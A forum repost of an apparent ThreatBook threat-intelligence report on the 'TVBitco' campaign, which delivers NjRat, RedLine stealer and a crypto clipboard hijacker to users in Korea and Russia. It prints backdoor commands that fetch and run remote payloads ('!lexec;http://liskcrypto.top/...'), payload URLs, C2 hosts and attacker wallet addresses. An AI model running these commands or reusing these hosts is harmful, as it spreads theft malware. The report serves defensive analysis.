TVBitco团伙针对朝鲜半岛和俄罗斯地区的黑产活动|安全事件分析报告

[复制链接]

14

主题

14

帖子

42

积分

新手上路

Rank: 1

积分
42
发表于 2020-10-28 21:56:41 | 显示全部楼层 |阅读模式 | 来自河北

TAG:TVBitco、NSIS、朝鲜半岛、俄罗斯、NjRat、Reline、窃取数字货币、间谍软件

TLP:白(报告转发及使用不受限制)

日期:2020-08-04



概述

近日,微步情报局捕获到多个利用TeamViewer组件加载恶意DLL的NSIS软件安装包,NSIS安装包伪装成视频解码软件包存放在具有诱导用户安装行为的网站上,如“安装插件可获取广告利益回报”、“比特币彩票-每小时赢取免费比特币!”的话题网站。


深入挖掘后发现,背后的黑客团伙至少自2020年1月开始活跃,恶意网站URL主要在一些数字货币论坛推广,此外还包括推特、YouTube等。主要针对目标是朝鲜半岛和俄罗斯地区关心数字货币的用户,其目的是盗取数字货币。


根据木马的加载特性和黑客资产特点,我们将该黑客团伙命名为“TVBitco”。


本报告内容主要包含TVBitco团伙近期活动相关的样本分析。部分发现如下:


  • 恶意NSIS软件包存放在一些具备诱导性标题的网站上,如“安装插件可获取广告利益回报”和“比特币彩票-每小时赢取免费比特币!”,诱导用户安装恶意NSIS软件包,NSIS软件名涉及韩语和俄语两种语言。

  • NSIS软件包会释放TeamViewer组件和恶意DLL,通过DLL劫持方式加载后门木马。木马具备:restart、lexec、cmd、delproc、vpnrun、genid等命令。

  • 命令监控过程中,我们捕获到三类Payload。包括:NjRat远控、Reline远控和数字货币钱包地址替换程序,值得一提的是两种远控均具备收集数字货币钱包地址的能力。
  • 根据黑客的资产注册时间、样本时间和文件名等特点,我们判研TVBitco团伙至少自2020年1月开始活跃,主要针对目标是朝鲜半岛和俄罗斯地区关心数字货币的用户。 



详情

近日,微步情报局捕获到多个利用TeamViewer组件加载恶意DLL的NSIS软件安装包,NSIS安装包伪装成视频解码软件包存放在具有诱导用户安装行为的网站上,如“安装插件可获取广告利益回报”、“比特币彩票-每小时赢取免费比特币!”的话题网站。

相关攻击的整体攻击流程如下:



样本分析


基本信息

样本类型
PE32 executable (GUI) Intel 80386, for MS Windows
PE: installer: Nullsoft Scriptable Install System(3.04)[-]
样本大小
4179753
时间戳
2018-12-16 06:24:41

SHA256

54cc3426c8ad3f2d39543a8157843620af7108ea419589cc6755e77a31b96047

SHA1
598a1a2ee7f50ccc19ce2c7afe25b98c990ee755
MD5
000c1b0b4711f08ab3ae7f28f30ee944

1. 编译的PE文件语言为韩语,伪装成MPEG-1解码软件安装包,携带无效数字签名,PE描述信息如下:


2. 由于是NSIS安装包,直接执行会释放相关文件,释放文件如下:


3. 释放包含TeamViewer组件的多个文件到Temp目录,并且调用bat文件复制文件到” %appdata%\NtData”,脚本截图如下:


4. 释放的组件如下:

5. 经过分析确认“msi.dll”为恶意DLL,bat通过调用TeamViewer组件中 的“wmiprvse.exe”程序,实现白加黑绕过杀软的手法。


“msi.dll”文件基本信息
样本类型
PE32 executable (DLL) (console) Intel 80386, for MS Windows
样本大小
27136
时间戳
2020-07-24 19:34:44
SHA256
7dfa37218b07331ff7253ddfb46d2288c1c1acc02b3e54538bb4fbb85616c9bf
SHA1
3bf5484dfb4ff2d668cdc1fb8589d548dfa3d77c
MD5
fbe04bc9d317e39f46d1e4aba8fda46f


1. 该文件插入大量花指令干扰静态分析,DLL首先会写入自启动项,保持持久化能力。



2. 判断是否存在“TASKMGR.EXE”、“PROCEXP.EXE”进程,提高隐蔽能力。


3. 判断回车键、空格键、SHIFT键是否处于按下状态,并且判断鼠标是否移动,此处目的是判断是否有用户正在操作,如果处于空闲状态则执行后续的恶意代码。


4. 格式化通信URL:


5. 然后通过HTTP的函数请求命令,实现如下:


6. 解析HTTP请求数据包,根据返回包中的字符串执行对应命令。具备的命令包括:restart、lexec、cmd、delproc、vpnrun、genid。


命令监控

在后续监控黑客下发过程中,捕获到三类Payload样本。分别名字为:serv.exe、zbs.exe、bufera.exe。



Payload分析

“serv.exe”基本信息

样本类型
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
样本大小
30720
编译时间
2020-07-27 02:55:23
SHA256
25c0754621f5c8de0e8a71235e26c6797d21a70ed779ec455d4b589c2ce53bb8
SHA1
2246fe2e6b4d9d285ec8681075f21857ac31392f
MD5
e66275001ba64db5d3fa293f6f4c152f
下发指令
!lexec;http://liskcrypto.top/serv.exe

1. 经过微步在线云沙箱多引擎分析后,判定该文件所属家族为 Bladabindi(NjRat)。

2. 涉及的回连C2: “cob.payeermine.com:9999,momogilagi.ddns.net:56355”

截图如下:

3. Njrat又称Bladabindi,该木马家族使用.NET框架编写,是一个典型的RAT类程序,通过控制端可以操作受控端的文件、进程、服务、注册表内容、获取浏览器Cookie和密码、勒索压力测试、BTC钱包采集、检测杀软等功能。


“zbs.exe”基本信息

样本类型
PE32 executable (GUI) Intel 80386, for MS WindowsMS Windows
样本大小
5836800
编译时间
2012-07-14 06:47:16
SHA256
88741b14f426f4cb2f942dea22a70f85ae06a9e86ee03decd1ae79e6371f1b59
SHA1
e351c2a5bf2b01ba5e4cdcc6fa2084ac9241bcee
MD5
0904add71c8b1b59d251c3cc8e0d3841
下发指令
!lexec;http://liskcrypto.top/zbs.exe

1. 经过微步在线云沙箱多引擎分析后,判定该文件所属家族为Reline(RedLine stealer)远控木马。


2. 该木马通过HTTP方式回传系统信息,其中回传数据的为XML格式。


3. 微步在线沙箱行为判断截图如下:


4. Reline(RedLine stealer)远控木马在俄罗斯地下黑客论坛贩卖,该木马具备回传系统信息、收集基于Chromium和GeckoCookie和密码等、收集FTP客户端(FileZilla、WinSCP)数据、收集IM客户端(Pidgin)数据、收集数字货币钱包地址和下载文件执行等。


“bufera.exe”基本信

样本类型
PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
样本大小
23552
编译时间
2020-07-25 22:59:26
SHA256
a739910a18c1ded77bca7f33c0ff47bf2ef0c049bf0d53d2f7c045d25659581b
SHA1
84ba4b8b9f6e273d6c824ba9cfbf659b8dae120e
MD5
92cec63e095be5beb1029220cb585144
下发指令
!lexec;http://liskcrypto.top/bufera.exe

1. 重命名“%APPDATA%\\setup.exe”,并且拷贝文件到启动目录,实现持久化攻击。


2. 然后循环检测剪切板是否存在数字货币地址,如果检测到特定的数字货币则替换剪切板中的地址。


3. 涉及钱包地址如下:

1GuxVaa3QqeyXGc13MFzmasMRK7HZwbA18
0x9115a0A114C25fde83551468593E76Ba482152
47hVqg4ztcXE8dBe8JP6Q4KGu6FosHMUZNxkqi2EVXuCcfwkhKjrfxvL8E2X5vy4Mb8KihxnMEsoDXP8fV647yeARRhsv5C
LdYqPNQyHT41aFjiUTbq1AzrQSJVWfwD
t1Y6Qmv4prxQo1UM8wBp5FobbcELrNfG2q1
XpuowbrW6eS8pe4FxdAniHdiSpmqE6XD1S
DE9eDoKAByRh8K1HraQXAsuqRm3BBx4b3g


关联分析

1. 关联过程中,我们发现最新的一批样本主要是通过一些网站分发的,这类网站采用“点击查看广告获取利益”、“比特币彩票-每小时赢取免费比特币!”等描述标题,诱导用户下载安装扩展插件。


2. 此类网站会在一些社交论坛推广,搜索引擎检索结果如下:


3. 通过HTTP通信特征,我们还可以关联到早在1月份至5月份期间的样本,这个时间段的多数以scr后缀名结尾,scr样本通过携带CVE-2014-6352漏洞的DOCX文档释放。


4. 此外,还有VT用户发表过评论,认为这些早期的样本是通过电报APP方式传播的。


5. 关联到的最早一个域名“jmai.best”,其注册时间为“2019-12-24 13:25:36”,结合样本的出现时间,我们判研该黑产团伙最早时间为2020年1月份左右。


附录 - IOC

C2

tb.payeermine.com
tb.investimer.name
ico-information.com
jmai.best
biznestop2020.site
collinsgerber.com
179.43.160.169
193.187.174.155
193.187.173.112

投递网站

https://bitcoclaim.com/EarnExtension.exe
https://get-bitcoin.cc/BItcoBot.exe
https://rublemine.com/DogeTab.exe
http://moto-money.info/FreeBitcoBot.exe
http://179.43.160.169/msdn/x64.exe

Payload URL

http://claimdoge.io/pizd.exe
http://liskcrypto.top/bufera.exe
http://rublemine.com/lol.exe
http://multidoge.info/clip.exe
http://cpucap.site/pas.exe
http://dogechain.name/red.exe
http://bitcoroll.in/new.exe


Hash

8bd4e1e5cee72437b51af66e34142d87a640ff6789fae4f87d4ca0e45f51018a
54cc3426c8ad3f2d39543a8157843620af7108ea419589cc6755e77a31b96047
37b6d426f07d1d02939cacc09db7c7f9492e52d2b77ded98a237582bacda1bfb
c8ed9f34a94e77c6abf91bb07cc1641c92524680364addc5022691aace1beb8b
0709e1a9ea9226bc0fcfeef6cf06baf6c5225e0515eee7c3a4f636847f39d154
1d0d42eb83683b3c4471e62e79749da2ba7020f2b2f60da456d34a02abfc5a8e
981c82b52340a580f6b12568936e2f081fcab61700fc6924a788fc339904cce8
13fc43988f6bf9e0e29ddfd067dc7a83d4817982b0ad2c8c408cd14dcdbf5f4b
a69b06193d401fa2e6e5217aa0ff022f0edfd26a7540960a616df4a267924919
f4f9125cb53a2ee59487620721c0952fdb0a7aa1041c50326dc2d2009907e5a0
7001638138c0adbf4719a5588c5b990c33e05b735da23626b16f5948960561e9
5c720b436abf07fe4a2c46bfe0076dc256ba59fc7c64ce6abcc958c58c3eb47a
0a63606c985b20a28e30ab4c244282563b1e87617dd0b8c500872aebe4bc8ebb
309eba39abcef67079420197a32a7989ba10ee15c3e30fcd7146dbfa72b5d28e
743ef280d56ae0ad56748e96bbea62c496e37a9e84fe8116ddcd35b5c34b9ef4
2cfa0ebb7b377b1b80c098328cb9fbeeaadeee19d0b4cb69687e6efcaecc1de6
a0ee1b4c5b70f476fbd29ee391e6bf0439a00e057fb052e9db20fbf6c49a1c28
414fe16de218dba06c1a262e01b8e22ce01e1d134f4d15f2275091db65d37ce2
406a559aa6a5cb79fef83de3d287f3625beac33b1b26c51065a0f008c2fa2c3e
a8cffd1031498591a1099fa43b4deaac24907f7991b33eaf3bfcf4a86eb44754
fdafb44be84ea918c76a99f4c24c08fbe8de6648a4ad73614f77450aa2b43484
c5bbd064c5b5c0b20c82605fa5ef06c2d30e3c6aeec2d60158d31a39f35d8e14
64c01431dcff552f63ac54a1cc78be99ead71fbe89e1fb56006d190de0dd9ab4
2345b6657f9a1b859784e9726d02230b064311914c9594636265a372b85eec27
c0efcd4cbc22f8dccfa3dfda3ab89c77efbe248b7f193632752310f6807d3b86
41cac018e9353b91cf6ccf99cf69a3a1be78ff43813db5332f6c94a94e562a6a
769f21694c058b22888429e6f6d4d3527904d02da9abe0b4051745008ac7444b
6cf72b68be9629e1f7b4c198b2692278f53529987efcc4d828a3a51b4d62f239
c510b725c7f0964c044efde9704c06006fc9a9893b8069529a463f142f5042d6
d73498e0aabb97375783af491aded66aa6710ba848247de3337f404fa02a35c0
6d3a2dd3bd042a0484ba076f7ae7de39fb39d3aa7decc1809266c7e9b36dbb5a



关于微步在线研究响应团队

微步情报局,即微步在线研究响应团队,负责微步在线安全分析与安全服务业务,主要研究内容包括威胁情报自动化研发、高级APT组织&黑产研究与追踪、恶意代码与自动化分析技术、重大事件应急响应等。


微步情报局由精通木马分析与取证技术、Web攻击技术、溯源技术、大数据、AI等安全技术的资深专家组成,并通过自动化情报生产系统、云沙箱、黑客画像系统、威胁狩猎系统、追踪溯源系统、威胁感知系统、大数据关联知识图谱等自主研发的系统,对微步在线每天新增的百万级样本文件、千万级URL、PDNS、Whois数据进行实时的自动化分析、同源分析及大数据关联分析。微步情报局自设立以来,累计率先发现了包括数十个境外高级APT组织针对我国关键基础设施和金融、能源、政府、高科技等行业的定向攻击行动,协助数百家各个行业头部客户处置了肆虐全球的WannaCry勒索事件、BlackTech定向攻击我国证券和高科技事件、海莲花长期定向攻击我国海事/高科技/金融的攻击活动、OldFox定向攻击全国上百家手机行业相关企业的事件。





微步在线

研究响应中心

-长按二维码关注我们-




回复

使用道具 举报

发表回复

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表